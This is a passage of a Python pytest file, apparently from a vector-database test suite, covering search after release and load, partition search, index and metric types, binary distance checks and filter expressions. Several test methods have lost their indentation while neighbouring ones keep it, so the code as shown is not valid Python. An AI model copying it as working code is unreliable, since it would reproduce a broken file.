log.info("test_search_collection_after_release_load: releasing collection %s" % collection_w.name)
collection_w.release()
log.info("test_search_collection_after_release_load: released collection %s" % collection_w.name)
# 3. Search the pre-released collection after load
log.info("test_search_collection_after_release_load: loading collection %s" % collection_w.name)
collection_w.load()
log.info("test_search_collection_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.xfail(reason="issue 6997")
    def test_search_partition_after_release_load(self, nb, nq, dim, auto_id, _async):
        """
        target: search the pre-released collection after load
        method: 1. create collection
                2. release a partition
                3. load partition
                4. search the pre-released partition
        expected: search successfully
        """
        # 1. initialize without data
        collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
                                                                                  1, auto_id=auto_id,
                                                                                  dim=dim)[0:5]
        # 2. release collection
        log.info("test_search_partition_after_release_load: releasing a partition")
        par = collection_w.partitions
        # release par[1] through the raw connection
        conn = self.connection_wrap.get_connection()[0]
        conn.release_partitions(collection_w.name, [par[1].name])
        log.info("test_search_partition_after_release_load: released a partition")
        # 3. Search the collection after load
        limit = 1000
        collection_w.load()
        log.info("test_search_partition_after_release_load: searching after load")
        vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
        collection_w.search(vectors[:nq], default_search_field, default_search_params,
                            limit, default_search_exp, _async=_async,
                            travel_timestamp=time_stamp,
                            check_task=CheckTasks.check_search_results,
                            check_items={"nq": nq,
                                         "ids": insert_ids,
                                         "limit": limit,
                                         "_async": _async})
        # 4. Search the pre-released partition after load
        # cap the expected hit count at the partition's actual size
        if limit > par[1].num_entities:
            limit_check = par[1].num_entities
        else:
            limit_check = limit
        collection_w.search(vectors[:nq], default_search_field, default_search_params,
                            limit, default_search_exp,
                            [par[1].name], _async=_async,
                            travel_timestamp=time_stamp,
                            check_task=CheckTasks.check_search_results,
                            check_items={"nq": nq,
                                         # ids after par[0]'s rows belong to par[1]
                                         "ids": insert_ids[par[0].num_entities:],
                                         "limit": limit_check,
                                         "_async": _async})
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_load_flush_load(self, nb, nq, dim, auto_id, _async):
        """
        target: test search when load before flush
        method: 1. search the collection
                2. insert data and load
                3. flush, and load
        expected: search success with limit(topK)
        """
        # 1. initialize with data
        collection_w = self.init_collection_general(prefix, auto_id=auto_id, dim=dim)[0]
        # 2. insert data
        insert_ids = cf.insert_data(collection_w, nb, auto_id=auto_id, dim=dim)[3]
        # 3. load data
        collection_w.load()
        # 4. flush and load
        # num_entities is accessed purely for its side effect — it performs
        # the flush this step refers to.
        collection_w.num_entities
        collection_w.load()
        # 5. search for new data without load
        vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
        collection_w.search(vectors[:nq], default_search_field,
                            default_search_params, default_limit,
                            default_search_exp, _async=_async,
                            check_task=CheckTasks.check_search_results,
                            check_items={"nq": nq,
                                         "ids": insert_ids,
                                         "limit": default_limit,
                                         "_async": _async})
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_new_data(self, nq, dim, auto_id, _async):
        """
        target: test search new inserted data without load
        method: 1. search the collection
                2. insert new data
                3. search the collection without load again
        expected: new data should be searched
        """
        # 1. initialize with data
        limit = 1000
        nb_old = 500
        collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb_old,
                                                                                  auto_id=auto_id,
                                                                                  dim=dim)[0:5]
        # 2. search for original data after load
        vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
        log.info("test_search_new_data: searching for original data after load")
        # only nb_old entities exist yet, so hits are capped at nb_old
        collection_w.search(vectors[:nq], default_search_field,
                            default_search_params, limit,
                            default_search_exp, _async=_async,
                            travel_timestamp=time_stamp+1,
                            check_task=CheckTasks.check_search_results,
                            check_items={"nq": nq,
                                         "ids": insert_ids,
                                         "limit": nb_old,
                                         "_async": _async})
        # 3. insert new data
        nb_new = 300
        _, _, _, insert_ids_new, time_stamp = cf.insert_data(collection_w, nb_new,
                                                             auto_id=auto_id, dim=dim,
                                                             insert_offset=nb_old)
        insert_ids.extend(insert_ids_new)
        # gracefulTime is default as 1s which allows data
        # could not be searched instantly in gracefulTime
        time.sleep(gracefulTime)
        # 4. search for new data without load
        # both old and new rows must now be visible (nb_old + nb_new hits)
        collection_w.search(vectors[:nq], default_search_field,
                            default_search_params, limit,
                            default_search_exp, _async=_async,
                            travel_timestamp=time_stamp,
                            check_task=CheckTasks.check_search_results,
                            check_items={"nq": nq,
                                         "ids": insert_ids,
                                         "limit": nb_old + nb_new,
                                         "_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_max_dim(self, auto_id, _async):
"""
target: test search with max configuration
method: create connection, collection, insert and search with max dim
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 100,
auto_id=auto_id,
dim=max_dim)[0:4]
# 2. search
nq = 2
log.info("test_search_max_dim: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(max_dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, nq,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nq,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_different_index_with_params(self, dim, index, params, auto_id, _async):
"""
target: test search after different index
method: test search after different index and corresponding search params
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)[0:5]
# 2. create index and load
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim // 4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim // 4
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_index_different_metric_type(self, dim, index, params, auto_id, _async):
"""
target: test search with different metric type
method: test search with different metric type
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)[0:5]
# 2. create different index
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim // 4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim // 4
log.info("test_search_after_index_different_metric_type: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "IP"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_after_index_different_metric_type: Created index-%s" % index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index, "IP")
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_multiple_times(self, nb, nq, dim, auto_id, _async):
"""
target: test search for multiple times
method: search for multiple times
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search for multiple times
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_collection_multiple_times: searching round %d" % (i + 1))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_sync_async_multiple_times(self, nb, nq, dim, auto_id):
"""
target: test async search after sync search case
method: create connection, collection, insert,
sync search and async search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:5]
# 2. search
log.info("test_search_sync_async_multiple_times: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_sync_async_multiple_times: searching round %d" % (i + 1))
for _async in [False, True]:
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_multiple_vectors(self, nb, nq, dim, auto_id, _async):
        """
        target: test search with multiple vectors
        method: create connection, collection with multiple
                vectors, insert and search
        expected: search successfully with limit(topK)
        """
        # 1. connect
        self._connect()
        # 2. create collection with multiple vectors
        c_name = cf.gen_unique_str(prefix)
        # schema holds two float-vector fields: the default one and "tmp"
        fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(),
                  cf.gen_float_vec_field(dim=dim), cf.gen_float_vec_field(name="tmp", dim=dim)]
        schema = cf.gen_collection_schema(fields=fields, auto_id=auto_id)
        collection_w = self.collection_wrap.init_collection(c_name, schema=schema,
                                                            check_task=CheckTasks.check_collection_property,
                                                            check_items={"name": c_name, "schema": schema})[0]
        # 3. insert
        vectors = [[random.random() for _ in range(dim)] for _ in range(nb)]
        vectors_tmp = [[random.random() for _ in range(dim)] for _ in range(nb)]
        data = [[i for i in range(nb)], [np.float32(i) for i in range(nb)], vectors, vectors_tmp]
        # with auto_id the primary-key column must be omitted from the payload
        if auto_id:
            data = [[np.float32(i) for i in range(nb)], vectors, vectors_tmp]
        res = collection_w.insert(data)
        insert_ids = res.primary_keys
        assert collection_w.num_entities == nb
        # 4. load
        collection_w.load()
        # 5. search all the vectors
        log.info("test_search_multiple_vectors: searching collection %s" % collection_w.name)
        # search against each of the two vector fields in turn
        collection_w.search(vectors[:nq], default_search_field,
                            default_search_params, default_limit,
                            default_search_exp, _async=_async,
                            check_task=CheckTasks.check_search_results,
                            check_items={"nq": nq,
                                         "ids": insert_ids,
                                         "limit": default_limit,
                                         "_async": _async})
        collection_w.search(vectors[:nq], "tmp",
                            default_search_params, default_limit,
                            default_search_exp, _async=_async,
                            check_task=CheckTasks.check_search_results,
                            check_items={"nq": nq,
                                         "ids": insert_ids,
                                         "limit": default_limit,
                                         "_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_one_partition(self, nb, auto_id, _async):
"""
target: test search from partition
method: search from one partition
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
is_index=True)[0:5]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search in one partition
log.info("test_search_index_one_partition: searching (1000 entities) through one partition")
limit = 1000
par = collection_w.partitions
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
search_params = {"metric_type": "L2", "params": {"nprobe": 128}}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, limit, default_search_exp,
[par[1].name], _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, nb, nq, dim, auto_id, _async):
"""
target: test search from partitions
method: search from partitions
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search through partitions
log.info("test_search_index_partitions: searching (1000 entities) through partitions")
par = collection_w.partitions
log.info("test_search_index_partitions: partitions: %s" % par)
limit = 1000
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
[par[0].name, par[1].name], _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.parametrize("partition_names",
                             [["(.*)"], ["search(.*)"]])
    def test_search_index_partitions_fuzzy(self, nb, nq, dim, partition_names, auto_id, _async):
        """
        target: test search from partitions
        method: search from partitions with fuzzy
                partition name
        expected: searched successfully
        """
        # 1. initialize with data
        collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
                                                                      partition_num=1,
                                                                      auto_id=auto_id,
                                                                      dim=dim)[0:4]
        vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
        # 2. create index
        default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
        collection_w.create_index("float_vector", default_index)
        # 3. search through partitions
        log.info("test_search_index_partitions_fuzzy: searching through partitions")
        limit = 1000
        limit_check = limit
        par = collection_w.partitions
        # the "search(.*)" pattern targets only the non-default partition, so
        # restrict the expected ids and cap the hit count at its size
        if partition_names == ["search(.*)"]:
            insert_ids = insert_ids[par[0].num_entities:]
            if limit > par[1].num_entities:
                limit_check = par[1].num_entities
        collection_w.search(vectors[:nq], default_search_field,
                            default_search_params, limit, default_search_exp,
                            partition_names, _async=_async,
                            check_task=CheckTasks.check_search_results,
                            check_items={"nq": nq,
                                         "ids": insert_ids,
                                         "limit": limit_check,
                                         "_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partition_empty(self, nq, dim, auto_id, _async):
"""
target: test search the empty partition
method: search from the empty partition
expected: searched successfully with 0 results
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, auto_id=auto_id,
dim=dim, is_index=True)[0]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create empty partition
partition_name = "search_partition_empty"
collection_w.create_partition(partition_name=partition_name, description="search partition empty")
par = collection_w.partitions
log.info("test_search_index_partition_empty: partitions: %s" % par)
collection_w.load()
# 3. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 4. search the empty partition
log.info("test_search_index_partition_empty: searching %s "
"entities through empty partition" % default_limit)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, [partition_name],
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
    def test_search_binary_jaccard_flat_index(self, nq, dim, auto_id, _async, index):
        """
        target: search binary_collection, and check the result: distance
        method: compare the return distance value with value computed with JACCARD
        expected: the return distance equals to the computed value
        """
        # 1. initialize with binary data
        collection_w, _, binary_raw_vector, insert_ids, time_stamp = self.init_collection_general(prefix, True, 2,
                                                                                                  is_binary=True,
                                                                                                  auto_id=auto_id,
                                                                                                  dim=dim,
                                                                                                  is_index=True)[0:5]
        # 2. create index
        default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "JACCARD"}
        collection_w.create_index("binary_vector", default_index)
        collection_w.load()
        # 3. compute the distance
        # reference distances from the first query vector to both inserted rows
        query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
        distance_0 = cf.jaccard(query_raw_vector[0], binary_raw_vector[0])
        distance_1 = cf.jaccard(query_raw_vector[0], binary_raw_vector[1])
        # 4. search and compare the distance
        search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
        res = collection_w.search(binary_vectors[:nq], "binary_vector",
                                  search_params, default_limit, "int64 >= 0",
                                  _async=_async,
                                  travel_timestamp=time_stamp,
                                  check_task=CheckTasks.check_search_results,
                                  check_items={"nq": nq,
                                               "ids": insert_ids,
                                               "limit": 2,
                                               "_async": _async})[0]
        if _async:
            res.done()
            res = res.result()
        # the top-1 distance must equal the closer of the two reference values
        assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
    def test_search_binary_hamming_flat_index(self, nq, dim, auto_id, _async, index):
        """
        target: search binary_collection, and check the result: distance
        method: compare the return distance value with value computed with HAMMING
        expected: the return distance equals to the computed value
        """
        # 1. initialize with binary data
        # Only 2 entities are inserted so the nearest hit must be one of them.
        collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
                                                                                      is_binary=True,
                                                                                      auto_id=auto_id,
                                                                                      dim=dim,
                                                                                      is_index=True)[0:4]
        # 2. create index
        default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "HAMMING"}
        collection_w.create_index("binary_vector", default_index)
        # 3. compute the distance
        collection_w.load()
        # Ground-truth Hamming distances from query vector 0 to both stored rows.
        query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
        distance_0 = cf.hamming(query_raw_vector[0], binary_raw_vector[0])
        distance_1 = cf.hamming(query_raw_vector[0], binary_raw_vector[1])
        # 4. search and compare the distance
        search_params = {"metric_type": "HAMMING", "params": {"nprobe": 10}}
        res = collection_w.search(binary_vectors[:nq], "binary_vector",
                                  search_params, default_limit, "int64 >= 0",
                                  _async=_async,
                                  check_task=CheckTasks.check_search_results,
                                  check_items={"nq": nq,
                                               "ids": insert_ids,
                                               "limit": 2,
                                               "_async": _async})[0]
        if _async:
            res.done()
            res = res.result()
        # Top hit's distance must equal the smaller of the two computed values.
        assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.xfail(reason="issue 6843")
    @pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
    def test_search_binary_tanimoto_flat_index(self, nq, dim, auto_id, _async, index):
        """
        target: search binary_collection, and check the result: distance
        method: compare the return distance value with value computed with TANIMOTO
        expected: the return distance equals to the computed value
        """
        # 1. initialize with binary data
        # Only 2 entities are inserted so the nearest hit must be one of them.
        collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
                                                                                      is_binary=True,
                                                                                      auto_id=auto_id,
                                                                                      dim=dim,
                                                                                      is_index=True)[0:4]
        log.info("auto_id= %s, _async= %s" % (auto_id, _async))
        # 2. create index
        default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "TANIMOTO"}
        collection_w.create_index("binary_vector", default_index)
        collection_w.load()
        # 3. compute the distance
        # Ground-truth Tanimoto distances from query vector 0 to both stored rows.
        query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
        distance_0 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[0])
        distance_1 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[1])
        # 4. search and compare the distance
        search_params = {"metric_type": "TANIMOTO", "params": {"nprobe": 10}}
        res = collection_w.search(binary_vectors[:nq], "binary_vector",
                                  search_params, default_limit, "int64 >= 0",
                                  _async=_async,
                                  check_task=CheckTasks.check_search_results,
                                  check_items={"nq": nq,
                                               "ids": insert_ids,
                                               "limit": 2,
                                               "_async": _async})[0]
        if _async:
            res.done()
            res = res.result()
        # Marked xfail (issue 6843): this distance equality is known to fail.
        assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
    @pytest.mark.tags(CaseLabel.L1)
    @pytest.mark.parametrize("expression", cf.gen_normal_expressions())
    def test_search_with_expression(self, dim, expression, _async):
        """
        target: test search with different expressions
        method: test search with different expressions
        expected: searched successfully with correct limit(topK)
        """
        # 1. initialize with data
        nb = 1000
        collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True,
                                                                             nb, dim=dim,
                                                                             is_index=True)[0:4]
        # filter result with expression in collection
        _vectors = _vectors[0]
        # Milvus boolean operators are rewritten to Python syntax so the same
        # expression string can be evaluated locally to build the ground truth.
        expression = expression.replace("&&", "and").replace("||", "or")
        filter_ids = []
        for i, _id in enumerate(insert_ids):
            # These local names deliberately shadow builtins: the generated
            # expression references field names `int64` and `float` verbatim.
            int64 = _vectors.int64[i]
            float = _vectors.float[i]
            # NOTE: eval() runs test-generated expressions only, never
            # untrusted external input.
            if not expression or eval(expression):
                filter_ids.append(_id)
        # 2. create index
        index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
        collection_w.create_index("float_vector", index_param)
        collection_w.load()
        # 3. search with expression
        log.info("test_search_with_expression: searching with expression: %s" % expression)
        vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
        search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
                                            default_search_params, nb, expression,
                                            _async=_async,
                                            check_task=CheckTasks.check_search_results,
                                            check_items={"nq": default_nq,
                                                         "ids": insert_ids,
                                                         "limit": min(nb, len(filter_ids)),
                                                         "_async": _async})
        if _async:
            search_res.done()
            search_res = search_res.result()
        # Every returned id must belong to the locally-computed filter set.
        filter_ids_set = set(filter_ids)
        for hits in search_res:
            ids = hits.ids
            assert set(ids).issubset(filter_ids_set)
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.xfail(reason="issue 7910")
    @pytest.mark.parametrize("bool_type", [True, False, "true", "false", 1, 0, 2])
    def test_search_with_expression_bool(self, dim, auto_id, _async, bool_type):
        """
        target: test search with different bool expressions
        method: search with different bool expressions
        expected: searched successfully with correct limit(topK)
        """
        # 1. initialize with data
        nb = 1000
        collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
                                                                             is_all_data_type=True,
                                                                             auto_id=auto_id,
                                                                             dim=dim)[0:4]
        # 2. create index
        index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
        collection_w.create_index("float_vector", index_param)
        collection_w.load()
        # 3. filter result with expression in collection
        # Normalise the string spellings to Python bools for local comparison;
        # 1/0/2 are passed through unchanged on purpose.
        filter_ids = []
        bool_type_cmp = bool_type
        if bool_type == "true":
            bool_type_cmp = True
        if bool_type == "false":
            bool_type_cmp = False
        for i, _id in enumerate(insert_ids):
            if _vectors[0][f"{default_bool_field_name}"][i] == bool_type_cmp:
                filter_ids.append(_id)
        # 4. search with different expressions
        # The raw (unnormalised) bool_type is embedded in the server-side
        # expression to exercise each accepted spelling.
        expression = f"{default_bool_field_name} == {bool_type}"
        log.info("test_search_with_expression: searching with expression: %s" % expression)
        vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
        search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
                                            default_search_params, nb, expression,
                                            _async=_async,
                                            check_task=CheckTasks.check_search_results,
                                            check_items={"nq": default_nq,
                                                         "ids": insert_ids,
                                                         "limit": min(nb, len(filter_ids)),
                                                         "_async": _async})
        if _async:
            search_res.done()
            search_res = search_res.result()
        # Every returned id must belong to the locally-computed filter set.
        filter_ids_set = set(filter_ids)
        for hits in search_res:
            ids = hits.ids
            assert set(ids).issubset(filter_ids_set)
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.parametrize("expression", cf.gen_normal_expressions_field(default_float_field_name))
    def test_search_with_expression_auto_id(self, dim, expression, _async):
        """
        target: test search with different expressions
        method: test search with different expressions
        expected: searched successfully with correct limit(topK)
        """
        # 1. initialize with data
        nb = 1000
        collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
                                                                             auto_id=True,
                                                                             dim=dim,
                                                                             is_index=True)[0:4]
        # filter result with expression in collection
        _vectors = _vectors[0]
        expression = expression.replace("&&", "and").replace("||", "or")
        filter_ids = []
        for i, _id in enumerate(insert_ids):
            # exec() binds the field name (e.g. `float`) as a local so the
            # eval() below can reference it; both run test-generated strings
            # only, never untrusted input.
            exec(f"{default_float_field_name} = _vectors.{default_float_field_name}[i]")
            if not expression or eval(expression):
                filter_ids.append(_id)
        # 2. create index
        index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
        collection_w.create_index("float_vector", index_param)
        collection_w.load()
        # 3. search with different expressions
        log.info("test_search_with_expression: searching with expression: %s" % expression)
        vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
        search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
                                            default_search_params, nb, expression,
                                            _async=_async,
                                            check_task=CheckTasks.check_search_results,
                                            check_items={"nq": default_nq,
                                                         "ids": insert_ids,
                                                         "limit": min(nb, len(filter_ids)),
                                                         "_async": _async})
        if _async:
            search_res.done()
            search_res = search_res.result()
        # Every returned id must belong to the locally-computed filter set.
        filter_ids_set = set(filter_ids)
        for hits in search_res:
            ids = hits.ids
            assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
def test_search_expression_all_data_type(self, nb, nq, dim, auto_id, _async):
"""
target: test search using different supported data type
method: search using different supported data type
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_expression_all_data_type: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
search_exp = "int64 >= 0 && int32 >= 0 && int16 >= 0 " \
"&& int8 >= 0 && float >= 0 && double >= 0"
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_with_output_fields_empty(self, nb, nq, dim, auto_id, _async):
        """
        target: test search with output fields
        method: search with empty output_field
        expected: search success
        """
        # 1. initialize with data
        collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
                                                                      auto_id=auto_id,
                                                                      dim=dim)[0:4]
        # 2. search
        log.info("test_search_with_output_fields_empty: Searching collection %s" % collection_w.name)
        vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
        # output_fields=[] requests no scalar fields back at all.
        res = collection_w.search(vectors[:nq], default_search_field,
                                  default_search_params, default_limit,
                                  default_search_exp, _async=_async,
                                  output_fields=[],
                                  check_task=CheckTasks.check_search_results,
                                  check_items={"nq": nq,
                                               "ids": insert_ids,
                                               "limit": default_limit,
                                               "_async": _async})[0]
        if _async:
            res.done()
            res = res.result()
        # Hits must contain no row data when no output fields were requested.
        assert len(res[0][0].entity._row_data) == 0
    @pytest.mark.tags(CaseLabel.L1)
    def test_search_with_output_field(self, auto_id, _async):
        """
        target: test search with output fields
        method: search with one output_field
        expected: search success
        """
        # 1. initialize with data
        collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
                                                                      auto_id=auto_id)[0:4]
        # 2. search
        # `vectors` here is a module-level fixture (not built locally as in
        # sibling tests) — presumably sized for default_nq; verify if dims change.
        log.info("test_search_with_output_field: Searching collection %s" % collection_w.name)
        res = collection_w.search(vectors[:default_nq], default_search_field,
                                  default_search_params, default_limit,
                                  default_search_exp, _async=_async,
                                  output_fields=[default_int64_field_name],
                                  check_task=CheckTasks.check_search_results,
                                  check_items={"nq": default_nq,
                                               "ids": insert_ids,
                                               "limit": default_limit,
                                               "_async": _async})[0]
        if _async:
            res.done()
            res = res.result()
        # The single requested field must appear in each hit's row data.
        assert len(res[0][0].entity._row_data) != 0
        assert default_int64_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with multiple output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_with_output_fields: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*"], ["*", default_float_field_name]])
def test_search_with_output_field_wildcard(self, output_fields, auto_id, _async):
"""
